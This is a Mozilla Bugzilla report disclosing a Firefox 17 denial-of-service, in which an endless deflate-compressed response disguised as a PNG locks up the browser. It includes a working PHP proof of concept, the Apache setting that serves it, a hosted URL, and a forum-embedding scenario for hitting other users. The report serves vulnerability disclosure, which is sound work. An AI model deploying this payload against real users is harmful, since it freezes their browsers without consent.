Crafted infinite deflated content locks up Firefox

UNCONFIRMED
Unassigned

Status

()

Core
Networking: HTTP
P5
critical
UNCONFIRMED
5 years ago
4 months ago

People

(Reporter: Cathy J. Fitzpatrick, Unassigned)

Tracking

17 Branch
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [necko-would-take], URL)

(Reporter)

Description

5 years ago
User Agent: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0
Build ID: 20121130221523

Steps to reproduce:

Currently, Firefox (tested on 17.0.1 on GNU/Linux) locks up when attempting to load deflated content when (a) the content does not end and (b) the content is sent in sufficiently large chunks.

For proof of concept, see http://shared.cathyjf.com/crafted-image.png which is a crafted "image" that should lock up Firefox within a couple seconds, rendering it nonresponsive to any further input. This image can be embedded on other pages, and then those pages will lock up Firefox as well. It's probably even more potent if you embed multiple of these images on one page.

One potential application of this issue is that anybody could post something like [img]http://shared.cathyjf.com/crafted-image.png[/img] on a forum and then any Firefox users viewing the forum would be locked up.

The crafted-image.png file is actually a trivial PHP program, specifically the following program:

<?php
header('Content-type: image/png');
$s = sprintf("%60000u\n", 0);
while (true) echo $s;
?>

To deploy on Apache, you would have to set something like this in the .htaccess file:

AddOutputFilterByType DEFLATE image/png


Actual results:

http://shared.cathyjf.com/crafted-image.png causes Firefox to lock up


Expected results:

Firefox should not lock up
(Reporter)

Updated

5 years ago
Severity: normal → critical
(Reporter)

Updated

5 years ago
OS: Linux → All
Hardware: x86 → All
Version: unspecified → 17 Branch
(Reporter)

Comment 1

5 years ago
Public version at Bug #832586.
Opening per Cathy's request.
Group: core-security
Component: General → Networking: HTTP
Whiteboard: [necko-would-take]
You need to log in before you can comment on or make changes to this bug.